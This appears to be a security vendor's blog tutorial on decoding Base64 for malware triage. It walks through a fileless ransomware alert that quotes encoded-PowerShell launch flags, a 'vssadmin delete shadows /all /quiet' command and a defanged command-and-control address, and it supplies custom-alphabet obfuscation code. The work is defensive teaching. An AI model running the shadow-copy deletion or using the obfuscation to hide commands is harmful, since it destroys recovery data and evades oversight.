Encoded strings are everywhere and have many legitimate uses across the technology sector. They are also widely used by malware authors to disguise their attacks and to implement anti-analysis techniques designed to frustrate malware hunters and reverse engineers. Understanding the encoding methods threat actors use can help not only in everyday operations but importantly in cybersecurity and network security contexts. The most common methods are not terribly hard to learn and will help you to make better decisions on the legitimacy of a command or call seen on your network. In this article, I will share both a simple and a slightly more advanced understanding of Base64
encoding. These are the methods that I use to both encode and decode in my daily work.
A base64
string is pretty easy to identify:
VGhpcyBpcyB3aGF0IGJhc2U2NCBsb29rcyBsaWtlIGluIHRoZSB3aWxkLgo=
There are 64 characters in the Base64
“alphabet”, and an encoded string will contain a mixture of uppercase and lowercase letters, numbers, and sometimes an “=” or two (never more than two) at the end. These strings must also be divisible by 4 to be well-formed. The wiki article here goes into more details about the background of the encoding’s implementation and history, but here we’ll focus on the practical aspects within a security context.
There are a few things that I like to look for with base64
strings:
A good rule of thumb for this is to decrypt the string on the command line, and if you cannot read the output then try writing it to a file and use something like Detect It Easy (D.I.E.) to determine how you can view the file contents.
Decryption is extremely easy and can be done on any OS. Let’s take a look at not only decrypting but also encrypting because, who knows? Maybe one day you will need or want to know both sides of the process.
On macOS/Linux with Bash (CLI) we can simply echo
the target string and pipe it to the base64
utility:
$: echo "Hooked on phonics worked for me" | base64
On Windows, we can encode a string with PowerShell (CLI):
> [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("Hooked on phonics worked for me"))
Both will produce the same output:
SG9va2VkIG9uIHBob25pY3Mgd29ya2VkIGZvciBtZQo=
On macOS/Linux with Bash (CLI) it’s the same process, but this time we specify the --decode
option:
$: echo "SG9va2VkIG9uIHBob25pY3Mgd29ya2VkIGZvciBtZQo=" | base64 --decode
We can achieve the same thing with a Python script like this:
#!/usr/bin/env python import base64 # Replace the quoted text with the code you wish to decrypt. coded_string = 'SG9va2VkIG9uIHBob25pY3Mgd29ya2VkIGZvciBtZQo=' # Decrypt the code string. code_dump = base64.b64decode(coded_string) # Print the decryption output to the screen. print(code_dump) # Print the decryption output a file. f = open('base64_out.txt', 'w') f.write(code_dump) f.close()
On Windows with PowerShell (CLI):
> [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String('SG9va2VkIG9uIHBob25pY3Mgd29ya2VkIGZvciBtZQo='))
We can swap out ASCII for UTF-8 if we prefer:
> [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String('SG9va2VkIG9uIHBob25pY3Mgd29ya2VkIGZvciBtZQo='))
As we did with Python above, we can replace the one-liner CLI with a PowerShell script if we wish:
# Replace the quoted text with the code you wish to decrypt.; $coded_string = "SG9va2VkIG9uIHBob25pY3Mgd29ya2VkIGZvciBtZQo=" ; # Print the decryption output to the screen. [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($coded_string)); # Print the decryption output a file.; [System.Text.Encoding]::ASCII.GetString([System.Convert]::FromBase64String($coded_string)) | Out-File -Encoding "ASCII" base64_out.txt;
So let’s see how this could help us to understand an actual attack on the network. First, we take a look at an attack sequence; the first place I always look (if the process is there) will be PowerShell:
In this case, we have an alert regarding a PowerShell command. Given that this is a Fileless attack there is no hash reputation available via third party validation tools. This means we need to review the threat details and attempt to figure out if this alert is legitimate or not.
First we can review the Attack Story information in the Raw Data section of the SentinelOne console:
Instantly, we can see it begins with PowerShell executing a base64
encoded string.
Note that this command is packed with some very common command line arguments that are very useful to know:
-noP (-NoProfile)
-sta
-w (-WindowStyle <Window style>)
-enc (-EncodedCommand <Base64EncodedCommand>)
Looking at the process information reveals another indicator:
Our first red alert is the vssadmin.exe delete shadows /all /quiet command. This is not an indicator of malicious intent per se, but it is extremely common with nearly all ransomware. This is confirmed by the file manipulation events:
Note the file behavior illustrates modification to the content of “Wildlife.wmv” and a change of the file extension from “wmv” to “tgrpkty”, a strong indicator of ransomware behavior.
Now let’s go ahead and review the data in Deep Visibility so that we can see other IOCs that can aid us in prevention:
Here we see the long, encoded base64
string. It would be nice to know what it’s doing! Let’s extract the entire base64
code block. Using the information we learned earlier we can now decode the attack and gain a better idea of what this command is trying to do.
Here’s the encoded string:
Here’s what it looks like after being decoded with one of the methods we explained above:
We can now see the PowerShell in plain text, but let’s clean it up and “prettify” it. We can do that in Sublime Text with the help of a plugin. Here’s the decoded PowerShell now made much easier to read:
Now we can see that the command is reaching out to emp[.]fourhorsemen[.]tech
over port ‘8080? for the /login/process.php
file.
While this is a very simplistic use case it is a great example of what kind of counter intelligence can be obtained with 5 mins of extra work. Blocking the FQDN we extracted can not only increase infrastructure safety but also reduce the alerts that your IT or security team will need to address and save you time for other tasks in the future.
So if this is so easy to decode then why use it to obfuscate malicious code? Great question!
The answer is because Base64
is not only OS agnostic but, as it turns out, very robust and relatively easy to over engineer. Sooner or later you will run into something that fails to decode:
This is where you start doing things like dumping the output to a file and checking to see if it’s Windows shellcode, but this can also happen when the author uses a custom encoding key. Conceptually, that’s not hard to do, but it requires the attacker to make the decryption key available to the system, and that means defenders always have the opportunity to reverse it if they can catch it in action.
Let’s take a look. In Python, a simple way to create a base64
string with custom key is to use the translation module:
import string import base64 default_key = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/' custom_key = '0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ+/' encode_translation = string.maketrans(default_key, custom_key) decode_translation = string.maketrans(custom_key, default_key) def encode(input): return base64.b64encode(input).translate(encode_translation) def decode(input): return base64.b64decode(input.translate(decode_translation)) string = 'malicious commands' encoded_string = encode(string) print('Translation Key: '+custom_key) print('Plain Text String: '+string) print('Base64 Encoded Plain Text String: '+base64.b64encode(string)) print('Translated String: '+string.translate(encode_translation)) print('Base64 Encoded Translated String: '+encoded_string) print('-----------------------------------------------------------') print('Default Key: '+default_key) print('Default Key Decoded Translated Base64 String: '+encoded_string.translate(encode_translation)) print('Custom Key Decoded Translated Base64 String: '+encoded_string.translate(decode_translation)) print('Default Key Decoded Translated String: '+base64.b64decode(encoded_string)) print('Custom Key Decoded Translated String: '+decode(encoded_string))
This script creates an output like so:
Take note of the keys while we walk through this behavior
Default key
Custom key
The translation is actually very simplistic:
Using the above table you can see that when the script is translating strings:
and so on.
Now apply that logic to the string we are encoding with the script:
Plain Text String: malicious
Translated String: CqBysyEKI
So this means that while the plain text of:
malicious commands
would encode to the following base64
string:
bWFsaWNpb3VzIGNvbW1hbmRz
we now have a plain text string of:
CqBysyEKI sECCqDtI
which encodes to:
rm5IqmdFrTlP86dLrmRxrChP
Obviously this process is very different in PowerShell but still achievable:
Function encode_string { foreach ($c in $args[0].ToCharArray()) { if ($default_key.Contains($c)) { $encode_string = $encode_string + $custom_key[$default_key.indexof($c)] } else { $encode_string = $encode_string + $c } } return $encode_string } Function decode_string { foreach ($c in $args[0].ToCharArray()) { if ($default_key.Contains($c)) { $decode_string = $decode_string + $default_key[$custom_key.indexof($c)] } else { $decode_string = $decode_string + $c } } return $decode_string } $default_key = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" $custom_key = "0123456789abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ" $string = "malicious commands" $encoded_string = encode_string $string $decoded_string = decode_string $encoded_string $b64_default_encoded = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("$string")) $b64_custom_encoded = [System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("$encoded_string")) Write-Host "Translation Key:" $custom_key Write-Host "Plain Text String:" $string Write-Host "Base64 Encoded Plain Text String:" $b64_default_encoded Write-Host "Translated String:" $encoded_string Write-Host "Base64 Encoded Translated String:" $b64_custom_encoded Write-Host "-----------------------------------------------------------" Write-Host "Default Key:" $default_key Write-Host "Default Key Decoded Translated String:" $([System.Convert]::ToBase64String([System.Text.Encoding]::UTF8.GetBytes("$b64_custom_encoded"))) Write-Host "Custom Key Decoded Translated String:" $decoded_string
This gives the following output:
Encoding, encrypting, and obfuscating are becoming more and more commonplace in our age of technology. Knowing the basics is key to understanding not just how to identify threat actors and malicious files but also how to keep our end user data safe as well. It is not only important to understand how to read and reverse these strings but also to have security software on our network that can provide the visibility we need to see these bits of code so that we can attempt to identify new threats.
Like this article? Follow us on LinkedIn, Twitter, YouTube or Facebook to see the content we post.